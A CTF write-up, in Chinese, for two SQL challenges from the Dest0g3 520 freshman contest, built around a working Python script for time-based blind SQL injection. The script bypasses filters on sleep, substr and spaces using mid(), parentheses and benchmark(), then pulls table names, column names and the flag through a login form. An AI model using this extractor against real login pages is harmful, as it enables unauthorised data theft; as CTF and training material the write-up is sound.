Dest0g3 520迎新赛两道SQL
Really Easy SQL
不管输入什么，页面都只回显“信息有误”，因此可以考虑延时注入。过滤了 sleep、substr、空格等。
import requests
import time
# Login endpoint of the challenge instance; every probe below is POSTed here.
url = "http://81e5fe2b-9fa9-454d-90b8-14ce7016a589.node4.buuoj.cn:81/"
def SQL_injection() -> None:
    """Recover a string one character at a time via time-based blind SQL injection.

    The login page returns the same "information incorrect" message for every
    input, so the only side channel left is response latency: each probe asks
    the database to run ``benchmark(...)`` when one character guess is right,
    and a slow reply (more than 1 second here) is taken as "guess confirmed".
    The vulnerable parameter is ``username``; ``password`` is a dummy value.

    NOTE(review): indentation was lost in the original paste and has been
    reconstructed here from the statement order; the placement of the
    ``if(mid==128)`` guard and the two ``print(res)`` calls is inferred.

    Defender's view: the root cause is string-built SQL in the login handler,
    fixed by parameterised queries. Detection opportunities visible in this
    script are the ``benchmark(``/``information_schema`` tokens in the
    ``username`` field and a burst of login POSTs whose latency alternates
    between near-zero and several seconds.

    Returns:
        None. The recovered text is accumulated in ``res`` and printed.
    """
    res=""
    # i = 1-based character position; the loop caps the recovered string at 99 chars.
    for i in range(1,100):
        # Candidate byte value, scanned linearly over the printable ASCII range.
        mid=32
        while mid<128:
            # Earlier enumeration stages, kept as a record: each commented
            # payload is followed by the value it recovered on this instance.
            #payload="'||if(ascii(mid((database()),%d,1))=%d,benchmark(2500000,sha(1)),0)||'"%(i,mid)
            #database()=ctf
            #payload="'||if(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),%d,1))=%d,benchmark(3000000,sha(1)),0)||'"%(i,mid)
            #flaggg,user
            #payload="'||if(ascii(mid((select(group_concat(column_name))from(information_schema.columns)where(table_name='flaggg')),%d,1))=%d,benchmark(3000000,sha(1)),0)||'"%(i,mid)
            #cmd
            # Final stage: mid() replaces the filtered substr(), parentheses stand
            # in for the filtered spaces, and benchmark() for the filtered sleep().
            payload="'||if(ascii(mid((select(cmd)from(flaggg)),%d,1))=%d,benchmark(3000000,sha(1)),0)||'"%(i,mid)
            print(payload)
            # Wall-clock timing around the request is the whole oracle.
            begin_time=time.time()
            data={"username":payload, "password":"test"}
            r=requests.post(url=url, data=data)  # response body is never inspected
            end_time=time.time()
            #print(end_time-begin_time)
            # Fixed 1 s threshold: network jitter above this would yield a
            # wrong character, and no retry is attempted.
            if (end_time-begin_time)>1:
                res+=chr(mid)
                break
            mid+=1
        # No candidate matched at this position: assume the string has ended.
        if(mid==128):
            break
        # Progress report after every recovered character.
        print(res)
    print(res)
# Script entry point: run the extraction only when executed directly.
if __name__ == "__main__":
    SQL_injection()
easysql
同exp。